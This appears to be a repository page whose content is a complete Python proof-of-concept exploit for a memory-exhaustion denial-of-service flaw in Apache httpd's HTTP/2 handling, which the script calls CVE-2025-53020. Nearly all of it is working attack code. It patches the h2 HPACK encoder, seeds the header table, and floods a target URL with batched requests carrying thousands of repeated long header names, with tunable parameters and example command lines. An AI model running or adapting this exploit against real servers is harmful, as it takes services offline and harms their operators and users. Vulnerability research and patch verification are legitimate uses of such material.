README.md
Rendering markdown...
import h2.connection
import socket
import time
import tqdm
import argparse
import ssl
from urllib.parse import urlparse
import struct
class H2Attacker:
"""HTTP/2 client for testing memory exhaustion vulnerabilities in Apache httpd."""
def __init__(self, url):
"""Initialize the attacker with target URL.
Args:
url (str): Target URL (e.g., 'https://example.com/path')
"""
parsed_url = urlparse(url)
self.protocol = parsed_url.scheme
self.host = parsed_url.hostname
self.port = parsed_url.port or (443 if self.protocol == 'https' else 80)
self.path = parsed_url.path or '/'
# Validate required components
if not self.host:
raise ValueError(f"Invalid URL: {url}. Host is required.")
# Connection objects
self.socket = None
self.http2_connection = None
# Create pseudo headers from URL components
self.pseudo_headers = self._create_pseudo_headers()
self.default_headers = self.pseudo_headers.copy()
def _create_pseudo_headers(self):
"""Create HTTP/2 pseudo headers from URL components.
Returns:
list: List of pseudo header tuples
"""
return [
(':method', 'GET'),
(':path', self.path),
(':authority', self.host),
(':scheme', self.protocol)
]
def connect(self):
"""Establish HTTP/2 connection to the target server."""
try:
# Create socket connection
self.socket = socket.create_connection((self.host, self.port))
# Set SO_LINGER to 5 seconds to ensure graceful shutdown with FIN
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 5))
# Setup TLS if HTTPS
if self.protocol == 'https':
self._setup_tls()
# Initialize HTTP/2 connection
self.http2_connection = h2.connection.H2Connection()
self.http2_connection.initiate_connection()
self.socket.sendall(self.http2_connection.data_to_send())
# Apply the encoder patch for empty values
self._patch_encoder_for_empty_values()
except Exception as e:
raise ConnectionError(f"Failed to connect to {self.host}:{self.port}: {e}")
def _setup_tls(self):
"""Setup TLS connection with HTTP/2 ALPN."""
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
# Set ALPN to negotiate HTTP/2
context.set_alpn_protocols(['h2'])
# Wrap socket with TLS
self.socket = context.wrap_socket(self.socket, server_hostname=self.host)
# Ensure SSL handshake completes
self.socket.do_handshake()
def _patch_encoder_for_empty_values(self):
"""Patch the h2 encoder to fix empty value indexing bug."""
if not self.http2_connection:
raise RuntimeError("HTTP/2 connection not established")
original_add = self.http2_connection.encoder.add
def patched_add(to_add, sensitive, huffman=False):
name, value = to_add
# Set indexing mode
indexbit = b'\x40' if not sensitive else b'\x10' # INDEX_INCREMENTAL or INDEX_NEVER
# Search for matching header
match = self.http2_connection.encoder.header_table.search(name, value)
if match is None:
# Not in table - use original logic
return original_add(to_add, sensitive, huffman)
# Header is in table
index, found_name, found_value = match
# Fix: Check if found_value is not None (perfect match) instead of truthy
if found_value is not None:
# Perfect match - use indexed encoding
return self.http2_connection.encoder._encode_indexed(index)
else:
# Name-only match - use indexed literal
encoded = self.http2_connection.encoder._encode_indexed_literal(
index, value, indexbit, huffman
)
if not sensitive:
self.http2_connection.encoder.header_table.add(name, value)
return encoded
# Replace the add method
self.http2_connection.encoder.add = patched_add
def set_default_headers(self, additional_headers):
"""Set default headers by combining pseudo headers with additional headers.
Args:
additional_headers (list): List of additional header tuples
"""
self.default_headers = self.pseudo_headers + additional_headers
def send_headers(self, headers, add_pseudo_headers=True):
"""Send HTTP/2 headers for a single request.
Args:
headers (list): List of header tuples
add_pseudo_headers (bool): Whether to prepend pseudo headers
"""
if not self.http2_connection:
raise RuntimeError("HTTP/2 connection not established")
if add_pseudo_headers:
headers = self.pseudo_headers + headers
stream_id = self.http2_connection.get_next_available_stream_id()
self.http2_connection.send_headers(stream_id, headers, end_stream=True)
self.socket.sendall(self.http2_connection.data_to_send())
def send_default_headers(self):
"""Send a request using the default headers."""
if not self.default_headers:
raise ValueError("Default headers are not set")
self.send_headers(self.default_headers, add_pseudo_headers=False)
def add_headers_to_batch(self, headers):
"""Add headers to batch without sending immediately.
Args:
headers (list): List of header tuples
"""
if not self.http2_connection:
raise RuntimeError("HTTP/2 connection not established")
stream_id = self.http2_connection.get_next_available_stream_id()
self.http2_connection.send_headers(stream_id, headers, end_stream=False)
def send_batch(self):
"""Send all batched headers."""
if not self.http2_connection:
raise RuntimeError("HTTP/2 connection not established")
self.socket.sendall(self.http2_connection.data_to_send())
@staticmethod
def create_repeated_header_name_headers(header_name_length=4000, header_reps=1000, char_to_repeat='a'):
"""Create headers with repeated long header names.
Args:
header_name_length (int): Length of the header name
header_reps (int): Number of times to repeat the header
char_to_repeat (str): Character to use for the header name
Returns:
list: List of header tuples with repeated long names
"""
header_name = char_to_repeat * header_name_length
return [(header_name, '')] * header_reps
def run_attack_with_headers(self, headers, requests_per_batch, num_batches, delay_between_batches=0):
"""Run the memory exhaustion attack with specified headers.
Args:
headers (list): Headers to use for the attack
requests_per_batch (int): Number of requests to send per batch
num_batches (int): Number of batches to send
delay_between_batches (float): Delay in seconds between batches
"""
print(f"Starting attack: {num_batches} batches of {requests_per_batch} requests each")
for _ in tqdm.tqdm(range(num_batches), desc="Sending batches"):
for _ in range(requests_per_batch):
self.add_headers_to_batch(headers)
self.send_batch()
if delay_between_batches > 0:
time.sleep(delay_between_batches)
def run_attack_with_default_headers(self, requests_per_batch, num_batches, delay_between_batches=0):
"""Run attack using the default headers.
Args:
requests_per_batch (int): Number of requests to send per batch
num_batches (int): Number of batches to send
delay_between_batches (float): Delay in seconds between batches
"""
self.run_attack_with_headers(
self.default_headers, requests_per_batch, num_batches, delay_between_batches
)
def run_memory_exhaustion_attack(url, header_name_length, header_reps, requests_per_batch,
num_batches, delay_between_batches=0, num_headers_to_repeat=1):
"""Run the memory exhaustion attack against Apache httpd.
Args:
url (str): Target URL
header_name_length (int): Length of repeated header names
header_reps (int): Number of header repetitions per request
requests_per_batch (int): Number of requests per batch
num_batches (int): Number of batches to send
delay_between_batches (float): Delay between batches in seconds
num_headers_to_repeat (int): Number of different header names to create using different characters
"""
print(f"Targeting: {url}")
print(f"Header name length: {header_name_length}")
print(f"Header repetitions: {header_reps}")
print(f"Number of different header names: {num_headers_to_repeat}")
# Initialize attacker
attacker = H2Attacker(url)
attacker.connect()
# First, send an initial request to add the header to HPACK table
print("Sending initial request to populate HPACK table...")
initial_headers = H2Attacker.create_repeated_header_name_headers(
header_name_length=header_name_length, header_reps=1
)
attacker.send_headers(initial_headers)
# Prepare attack headers with different character patterns
print("Preparing attack headers...")
attack_headers = []
for i in range(num_headers_to_repeat):
char = chr(ord('a') + i)
headers = H2Attacker.create_repeated_header_name_headers(
header_name_length=header_name_length,
header_reps=header_reps,
char_to_repeat=char
)
attack_headers.extend(headers)
# Set as default headers and run attack
attacker.set_default_headers(attack_headers)
attacker.run_attack_with_default_headers(
requests_per_batch=requests_per_batch,
num_batches=num_batches,
delay_between_batches=delay_between_batches
)
print("Attack completed. Waiting for server response...")
time.sleep(5)
def main():
parser = argparse.ArgumentParser(
description='''HTTP/2 Memory Exhaustion PoC for Apache httpd
This tool exploits CVE-2025-53020 in Apache httpd by sending HTTP/2 requests with repetitive long header names,
which takes advantage of unnecessary memory duplication for header names.
The attack works by:
1. Creating long header names (--header-name-length) to maximize memory consumption
2. Optionally creating multiple distinct header names (--num-headers-to-repeat) using different characters (a, b, c, etc.)
3. Sending batches of requests (--batches) where:
- Each request contains multiple repetitions of the header names (--header-reps)
- Multiple requests can be sent per batch (--requests-per-batch)
- Optional delays between batches can be configured (--delay)
4. The server allocates memory for each header name occurrence, leading to memory exhaustion
Example usage:
python poc.py --url https://target.com/api/endpoint
python poc.py --url http://localhost:8080/test --header-reps 1000
python poc.py --url https://target.com --num-headers-to-repeat 3
''',
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('--url', required=True,
help='Target URL (e.g., https://example.com/path)')
parser.add_argument('--header-name-length', type=int, default=4064,
help='Length of header name (default: 4064)')
parser.add_argument('--header-reps', type=int, default=2063,
help='Number of header repetitions per request (default: 2063)')
parser.add_argument('--requests-per-batch', type=int, default=1,
help='Number of requests per batch (default: 1)')
parser.add_argument('--batches', type=int, default=100,
help='Number of batches (default: 100)')
parser.add_argument('--delay', type=float, default=0,
help='Delay between batches in seconds (default: 0)')
parser.add_argument('--num-headers-to-repeat', type=int, default=1,
help='Number of different header names to create (default: 1)')
args = parser.parse_args()
# If using multiple header names, force requests per batch to 1
if args.num_headers_to_repeat != 1:
if args.requests_per_batch != 1:
print(f"Warning: When using multiple header names > 1, requests per batch is recommended to be 1")
if args.header_name_length > 4000:
print(f"ERROR: When using multiple header names > 1, header name length should be less than 4000")
return 1
if args.header_name_length > 4064:
print(f"ERROR: Header name length should be less than 4064")
return 1
if args.header_reps > 2063:
print(f"Warning: Header reps should be less than 2063")
try:
run_memory_exhaustion_attack(
url=args.url,
header_name_length=args.header_name_length,
header_reps=args.header_reps,
requests_per_batch=args.requests_per_batch,
num_batches=args.batches,
delay_between_batches=args.delay,
num_headers_to_repeat=args.num_headers_to_repeat
)
except Exception as e:
print(f"Error: {e}")
return 1
return 0
if __name__ == "__main__":
exit(main())